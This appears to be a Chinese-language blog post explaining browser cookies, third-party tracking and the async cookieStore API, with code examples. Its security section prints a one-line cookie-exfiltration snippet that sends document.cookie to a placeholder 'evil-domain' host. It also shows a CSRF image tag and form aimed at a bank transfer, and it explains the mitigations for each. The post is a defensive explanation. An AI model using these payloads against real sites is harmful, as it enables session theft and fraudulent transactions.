<html>
<head>
    <meta charset="utf-8" />
<meta name="description" content="" />
<meta name="viewport" content="width=device-width, initial-scale=1" />

<title>cookieStore 的使用 | zkrisj</title>

<link rel="shortcut icon" href="https://zkrisj.gitee.io/favicon.ico?v=1679066285440">

<link href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" rel="stylesheet">
<link rel="stylesheet" href="https://zkrisj.gitee.io/styles/main.css">
<!-- <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.0/dist/css/bootstrap.min.css"> -->

<script src="https://cdn.jsdelivr.net/npm/@highlightjs/cdn-assets/highlight.min.js"></script>
<script src="https://cdn.bootcdn.net/ajax/libs/highlight.js/9.12.0/languages/dockerfile.min.js"></script>
<script src="https://cdn.bootcdn.net/ajax/libs/highlight.js/9.12.0/languages//dart.min.js"></script>

<!-- <script src="https://cdn.jsdelivr.net/npm/moment@2.27.0/moment.min.js"></script> -->
<!-- <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script> -->
<!-- <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js"></script> -->
<!-- <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.0/dist/js/bootstrap.min.js"></script> -->
<!-- DEMO JS -->
<!--<script src="media/scripts/index.js"></script>-->



    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.css">
    
</head>
<body>
<div class="main gt-bg-theme-color-first">
    <nav class="navbar navbar-expand-lg">
    <a class="navbar-brand" href="/">
        <img class="user-avatar" src="/images/avatar.png" alt="头像">
        <div class="site-name gt-c-content-color-first">
            zkrisj
        </div>
    </a>
    <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent"
        aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation" id="changeNavbar">
        <i class="fas fa-bars gt-c-content-color-first" style="font-size: 18px"></i>
    </button>
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <div class="navbar-nav mr-auto" style="text-align: center">
            
            <div class="nav-item">
                
                <a href="/" class="menu gt-a-link">
                    首页
                </a>
                
            </div>
            
            <div class="nav-item">
                
                <a href="/archives" class="menu gt-a-link">
                    归档
                </a>
                
            </div>
            
            <div class="nav-item">
                
                <a href="/tags" class="menu gt-a-link">
                    标签
                </a>
                
            </div>
            
            <div class="nav-item">
                
                <a href="/post/about" class="menu gt-a-link">
                    关于
                </a>
                
            </div>
            
        </div>
        <div style="text-align: center">
            <form id="gridea-search-form" style="position: relative" data-update="1679066285440"
                action="/search/">
                <input class="search-input" autocomplete="off" spellcheck="false" name="q" placeholder="搜索文章" />
                <i class="fas fa-search gt-c-content-color-first" style="position: absolute; top: 9px; left: 10px;"></i>
            </form>
        </div>
    </div>
</nav>
<script>
    /* 移动端导航栏展开/收起切换 */
    document.getElementById('changeNavbar').onclick = () => {
        var element = document.getElementById('navbarSupportedContent');
        if (element.style.display === 'none' || element.style.display === '') {
            element.style.display = 'block';
        } else {
            element.style.display = 'none';
        }
    }
</script>

    <div class="post-container">
        <div class="post-detail gt-bg-theme-color-second">
            <article class="gt-post-content">
                <h2 class="post-title">
                    cookieStore 的使用
                </h2>
                <div class="post-info">
                    <time class="post-time gt-c-content-color-first">
                        · 2022-09-30 ·
                    </time>
                    
                        <a href="https://zkrisj.gitee.io/tag/LYfiaPBFV/" class="post-tags">
                            # JS
                        </a>
                    
                </div>
                <div class="post-content">
                    <h2 id="介绍">介绍</h2>
<p><code>Cookie</code> 是服务器发送到用户浏览器并保存在本地的一小块数据，它会在浏览器下次向同一服务器再发起请求时被携带并发送到服务器上。也是一个 HTTP 请求标头，其中含有先前由服务器通过 <code>Set-Cookie</code> 响应标头发送或通过 JavaScript 的 <code>document.cookie</code> 方法设置，然后存储到本地的 Cookie。</p>
<p><code>Set-Cookie</code> 是一个 HTTP 响应标头，被用来由服务器端向浏览器发送 cookie，浏览器可在后续的请求中将其发送回服务器。服务器要发送多个 cookie，则应该在同一响应中发送多个 Set-Cookie 标头。</p>
<p>可以通过在浏览器的隐私设置里面设置为禁用 cookie，来阻止接收发送和本地设置。</p>
<p>Cookie 主要用于以下三个方面：</p>
<ul>
<li>会话状态管理（如用户登录状态、购物车、游戏分数或其它需要记录的信息）</li>
<li>个性化设置（如用户自定义设置、主题等）</li>
<li>浏览器行为跟踪（如跟踪分析用户行为等）</li>
</ul>
<h2 id="形式">形式</h2>
<p>一系列的名称/值对，形式为 <code>name=value; name2=value2; name3=value3</code>。名称/值对之间用分号和空格（'; '）隔开。</p>
<h2 id="cookie-存储">Cookie 存储</h2>
<p>Cookie 曾用于客户端数据的存储，因当时并没有其它合适的存储办法而作为唯一的存储手段。由于服务器指定 Cookie 后，浏览器的每次请求都会携带 Cookie 数据，会带来额外的性能开销（尤其是在移动环境下）。</p>
<p>在浏览器中存储数据的新特性方法是 Web Storage API。<code>window.sessionStorage</code> 和<code>window.localStorage</code> 属性与持续时间中的会话和永久 cookie 相对应，但是存储限制比 cookie 大，并且永远不会发送到服务器。</p>
<p>可以使用 IndexedDB API 或基于它构建的库来存储更多结构化的数据。</p>
<h2 id="安全">安全</h2>
<ol>
<li>如果 Web 应用的 Cookie 被窃取，可能导致授权用户的会话受到攻击。</li>
</ol>
<pre><code class="language-js">(new Image()).src = &quot;http://www.evil-domain.com/steal-cookie.php?cookie=&quot; + document.cookie;
</code></pre>
<p>使用 HttpOnly 属性可防止通过 JavaScript 访问 cookie 值，从而在一定程度上缓解此类攻击。</p>
<ol start="2">
<li>用于敏感信息（例如指示身份验证）的 Cookie 的生存期应较短。</li>
</ol>
<pre><code class="language-html">&lt;img src=&quot;http://bank.example.com/withdraw?account=bob&amp;amount=1000000&amp;for=mallory&quot;&gt;
</code></pre>
<p>当你打开含有了这张图片的 HTML 页面时，如果你之前已经登录了你的银行帐号并且 Cookie 仍然有效（还没有其它验证步骤），你银行里的钱很可能会被自动转走。一些方法可以阻止此类事件的发生：</p>
<ul>
<li>对用户输入进行过滤来阻止 XSS；</li>
<li>任何敏感操作都需要确认；</li>
<li>用于敏感信息的 Cookie 只能拥有较短的生命周期；</li>
</ul>
<ol start="3">
<li><code>Set-Cookie</code> 响应标头 <code>SameSite</code> 属性设置为 <code>Strict</code> 或 <code>Lax</code>，确保不与跨域请求一起发送身份验证 cookie。例如，用户登陆了银行网站 <code>your-bank.com</code>，银行服务器发来了一个 Cookie：<code>Set-Cookie:id=a3fWa;</code>。用户后来又访问了恶意网站 <code>malicious.com</code>，上面有一个表单。</li>
</ol>
<pre><code class="language-html">&lt;form action=&quot;your-bank.com/transfer&quot; method=&quot;POST&quot;&gt;
  ...
&lt;/form&gt;
</code></pre>
<p>用户一旦被诱骗发送这个表单，银行网站就会收到带有正确 Cookie 的转账请求。为了防止这种攻击，表单一般都带有一个随机 <code>token</code>，告诉服务器这是正确请求。</p>
<pre><code class="language-html">&lt;form action=&quot;your-bank.com/transfer&quot; method=&quot;POST&quot;&gt;
  &lt;input type=&quot;hidden&quot; name=&quot;token&quot; value=&quot;dad3weg34&quot;&gt;
  ...
&lt;/form&gt;
</code></pre>
<h2 id="第三方-cookie">第三方 Cookie</h2>
<p>Cookie 与域关联。如果此域与您所在页面的域相同，则该 cookie 称为第一方 cookie（ first-party cookie）。如果域不同，则它是第三方 cookie（third-party cookie）。当托管网页的服务器设置第一方 Cookie 时，该页面可能包含存储在其他域中的服务器上的图像或其他组件（例如，广告横幅），这些图像或其他组件可能会设置第三方 Cookie。这些主要用于在网络上进行广告和跟踪。比如，Facebook 在第三方网站插入一张看不见的图片。</p>
<pre><code class="language-html">&lt;img src=&quot;facebook.com&quot; style=&quot;visibility:hidden;&quot;&gt;
</code></pre>
<p>浏览器加载上面代码时，就会向 Facebook 发出带有 Cookie 的请求，如果你已经登录了 Facebook 帐号，Facebook 就会知道你访问了什么网站。</p>
<h2 id="支持-unicode-的-cookie-工具">支持 unicode 的 cookie 工具</h2>
<pre><code class="language-js">var docCookies = {
  getItem: function (sKey) {
    return decodeURIComponent(document.cookie.replace(new RegExp(&quot;(?:(?:^|.*;)\\s*&quot; + encodeURIComponent(sKey).replace(/[-.+*]/g, &quot;\\$&amp;&quot;) + &quot;\\s*\\=\\s*([^;]*).*$)|^.*$&quot;), &quot;$1&quot;)) || null;
  },
  setItem: function (sKey, sValue, vEnd, sPath, sDomain, bSecure) {
    if (!sKey || /^(?:expires|max\-age|path|domain|secure)$/i.test(sKey)) { return false; }
    var sExpires = &quot;&quot;;
    if (vEnd) {
      switch (vEnd.constructor) {
        case Number:
          sExpires = vEnd === Infinity ? &quot;; expires=Fri, 31 Dec 9999 23:59:59 GMT&quot; : &quot;; max-age=&quot; + vEnd;
          break;
        case String:
          sExpires = &quot;; expires=&quot; + vEnd;
          break;
        case Date:
          sExpires = &quot;; expires=&quot; + vEnd.toUTCString();
          break;
      }
    }
    document.cookie = encodeURIComponent(sKey) + &quot;=&quot; + encodeURIComponent(sValue) + sExpires + (sDomain ? &quot;; domain=&quot; + sDomain : &quot;&quot;) + (sPath ? &quot;; path=&quot; + sPath : &quot;&quot;) + (bSecure ? &quot;; secure&quot; : &quot;&quot;);
    return true;
  },
  removeItem: function (sKey, sPath, sDomain) {
    if (!sKey || !this.hasItem(sKey)) { return false; }
    document.cookie = encodeURIComponent(sKey) + &quot;=; expires=Thu, 01 Jan 1970 00:00:00 GMT&quot; + ( sDomain ? &quot;; domain=&quot; + sDomain : &quot;&quot;) + ( sPath ? &quot;; path=&quot; + sPath : &quot;&quot;);
    return true;
  },
  hasItem: function (sKey) {
    return (new RegExp(&quot;(?:^|;\\s*)&quot; + encodeURIComponent(sKey).replace(/[-.+*]/g, &quot;\\$&amp;&quot;) + &quot;\\s*\\=&quot;)).test(document.cookie);
  },
  keys: function () {
    var aKeys = document.cookie.replace(/((?:^|\s*;)[^\=]+)(?=;|$)|^\s*|\s*(?:\=[^;]*)?(?:\1|$)/g, &quot;&quot;).split(/\s*(?:\=[^;]*)?;\s*/);
    for (var nIdx = 0; nIdx &lt; aKeys.length; nIdx++) { aKeys[nIdx] = decodeURIComponent(aKeys[nIdx]); }
    return aKeys;
  }
};

docCookies.setItem(&quot;test1&quot;, &quot;Unicode test: \u00E0\u00E8\u00EC\u00F2\u00F9&quot;, Infinity);
docCookies.setItem(&quot;test2&quot;, &quot;Hello world!&quot;, new Date(2020, 5, 12));
docCookies.setItem(&quot;test3&quot;, &quot;Hello world!&quot;, new Date(2027, 2, 3), &quot;/blog&quot;);
docCookies.setItem(&quot;test4&quot;, &quot;Hello world!&quot;, &quot;Sun, 06 Nov 2022 21:43:15 GMT&quot;);
docCookies.setItem(&quot;test5&quot;, &quot;Hello world!&quot;, &quot;Tue, 06 Dec 2022 13:11:07 GMT&quot;, &quot;/home&quot;);
docCookies.setItem(&quot;test6&quot;, &quot;Hello world!&quot;, 150);
docCookies.setItem(&quot;test7&quot;, &quot;Hello world!&quot;, 245, &quot;/content&quot;);
docCookies.setItem(&quot;test8&quot;, &quot;Hello world!&quot;, null, null, &quot;example.com&quot;);
docCookies.setItem(&quot;test9&quot;, &quot;Hello world!&quot;, null, null, null, true);
docCookies.setItem(&quot;test1;=&quot;, &quot;Safe character test;=&quot;, Infinity);

docCookies.getItem(&quot;test1;=&quot;);
docCookies.removeItem(&quot;test7&quot;, &quot;/content&quot;);
</code></pre>
<p>路径限制并不能阻止从其他路径访问 cookie。使用简单的 DOM 即可轻易地绕过限制 (比如创建一个指向限制路径的，隐藏的 <code>iframe</code>, 然后访问其 <code>contentDocument.cookie</code> 属性)。保护 cookie 不被访问的唯一方法是将它放在另一个域名/子域名之下，利用同源策略保护其不被读取。</p>
<h2 id="cookiestore">cookieStore</h2>
<p>chrome 87 开始可用，是一个在 Window 或 ServiceWorkerGlobalScope 上下文中的全局属性，用于管理 cookie。</p>
<ol>
<li><code>document.cookie</code> 接口是同步的、单线程的和阻塞的。<code>cookieStore</code> 是异步的，基于 promise 的，因此不会阻塞事件循环。</li>
<li>因为在 service worker 无法访问 <code>document</code>，因此在 service worker 中也无法访问 <code>document.cookie</code>。而 <code>cookieStore</code> 不依赖于 <code>document</code>，所以在 service worker 中可用。</li>
</ol>
<h3 id="属性和方法">属性和方法</h3>
<p>delete(name)<br>
delete(options)</p>
<ul>
<li>name</li>
<li>带有 cookie 名称的字符串。</li>
<li>options</li>
<li>一个对象，包含：
<ul>
<li>name</li>
<li>带有 cookie 名称的字符串。</li>
<li>url 可选的</li>
<li>带有 cookie 的 URL 的字符串。</li>
<li>path 可选的</li>
<li>包含路径的字符串。</li>
</ul>
</li>
</ul>
<p>删除成功返回一个 <code>undefined</code> 作为 <code>resolve</code> 的 <code>Promise</code>，失败则抛出 <code>TypeError</code>。</p>
<p>get(name)<br>
get(options)</p>
<ul>
<li>name</li>
<li>带有 cookie 名称的字符串。</li>
<li>options</li>
<li>一个对象，包含：
<ul>
<li>name</li>
<li>带有 cookie 名称的字符串。</li>
<li>url</li>
<li>带有 cookie 的 URL 的字符串。</li>
</ul>
</li>
</ul>
<p>返回一个与名称或选项匹配的第一个 cookie 对象作为 <code>resolve</code> 的 <code>Promise</code>，该对象包含以下属性：</p>
<ul>
<li>name</li>
<li>包含 cookie 名称的字符串。</li>
<li>value</li>
<li>包含 cookie 值的字符串。</li>
<li>domain</li>
<li>包含 cookie 域的字符串。</li>
<li>path</li>
<li>包含 cookie 路径的字符串。</li>
<li>expires</li>
<li>DOMTimeStamp，包含 cookie 的到期日期。</li>
<li>secure</li>
<li>boolean，指示 cookie 是否仅在安全上下文中使用。</li>
<li>sameSite</li>
<li>以下值之一：
<ul>
<li>&quot;strict&quot;</li>
<li>Cookie 只会在第一方上下文中发送，不会随第三方网站发起的请求一起发送。</li>
<li>&quot;lax&quot;</li>
<li>Cookie 不会在正常的跨站点子请求中发送（例如，将图像或框架加载到第三方站点），而是在用户在源站点内导航时发送（即，当点击链接时）。</li>
<li>&quot;none&quot;</li>
<li>Cookie 将在所有情况下发送。</li>
</ul>
</li>
</ul>
<p>获取失败则抛出 <code>TypeError</code>。</p>
<p>getAll(name)<br>
getAll(options)</p>
<ul>
<li>name 可选的</li>
<li>带有 cookie 名称的字符串。</li>
<li>options 可选的</li>
<li>一个对象包含：
<ul>
<li>name</li>
<li>带有 cookie 名称的字符串。</li>
<li>url</li>
<li>带有 cookie 的 URL 的字符串。<br>
返回一个 cookie 对象数组作为 <code>resolve</code> 的 <code>Promise</code>，获取失败则抛出 <code>TypeError</code>。</li>
</ul>
</li>
</ul>
<p>set(name, value)<br>
set(options)</p>
<ul>
<li>name</li>
<li>带有 cookie 名称的字符串。</li>
<li>value</li>
<li>带有 cookie 值的字符串。</li>
<li>options</li>
<li>一个对象包含：
<ul>
<li>name</li>
<li>带有 cookie 名称的字符串。</li>
<li>value</li>
<li>带有 cookie 值的字符串。</li>
<li>expires 可选的</li>
<li>DOMTimeStamp包含 cookie 的到期日期。</li>
<li>domain 可选的</li>
<li>包含 cookie 域的字符串。</li>
<li>path 可选的</li>
<li>包含 cookie 路径的字符串。</li>
<li>sameSite 可选的</li>
<li>以下值之一：
<ul>
<li>&quot;strict&quot;</li>
<li>Cookie 只会在第一方上下文中发送，不会与第三方网站发起的请求一起发送。</li>
<li>&quot;lax&quot;</li>
<li>Cookie 不会在正常的跨站点子请求中发送（例如将图像或框架加载到第三方站点），而是在用户导航到源站点时发送（即，当点击链接时）。</li>
<li>&quot;none&quot;</li>
<li>Cookie 将在所有情况下发送。</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>设置成功返回一个 <code>undefined</code> 作为 <code>resolve</code> 的 <code>Promise</code>，失败则抛出 <code>TypeError</code>。如果 origin 不能被序列化为 URL，则抛出 <code>SecurityError</code>。</p>
<p>change 事件属性<br>
当删除或添加 cookie 时，会触发 <code>change</code> 事件。</p>
<p>其他属性和方法继承自 <code>EventTarget</code>。</p>
<h3 id="示例">示例</h3>
<pre><code class="language-js">cookieStore.onchange = function(e) {
  const type = e.deleted.length &gt; 0 ? '删除' : '添加';
  const item = e.deleted.length &gt; 0 ? e.deleted[0] : e.changed[0];
  console.log(type, item);
}; // 在set之前

cookieStore.set('cookie1', 'cookie1-value').then(e =&gt; console.log('添加成功')).catch(console.log);

const day = 24 * 60 * 60 * 1000;
cookieStore.set({
  name: 'cookie2',
  value: 'cookie2-value',
  expires: Date.now() + day,
  domain: '127.0.0.1'
}).then(e =&gt; console.log('添加成功')).catch(console.log);

deleteBtn.onclick = () =&gt; cookieStore.delete('cookie1').then(e =&gt; console.log('删除成功')).catch(console.log);
</code></pre>

                </div>
            </article>
        </div>

        
            <div class="next-post">
                <div class="next gt-c-content-color-first">下一篇</div>
                <a href="https://zkrisj.gitee.io/post/css-xin-xuan-ze-qi-is-where-has/" class="post-title gt-a-link">
                    CSS 新选择器 :is() :where() :has()
                </a>
            </div>
        

        

        

        

        <div class="site-footer gt-c-content-color-first">
    <div class="slogan gt-c-content-color-first">全栈技术文章记录博客</div>
    <div class="social-container">
        
            
        
            
        
            
        
            
        
            
        
            
        
    </div>
    <div class="footer-info">
        
    </div>
    <div>
        Theme <a href="https://github.com/imhanjie/gridea-theme-pure" target="_blank">Pure</a>, Powered by <a
                href="https://gridea.dev" target="_blank">Gridea</a> | <a href="https://zkrisj.gitee.io/atom.xml" target="_blank">RSS</a>
    </div>
</div>

<script>
  hljs.highlightAll()
</script>

    </div>
</div>
</body>
</html>
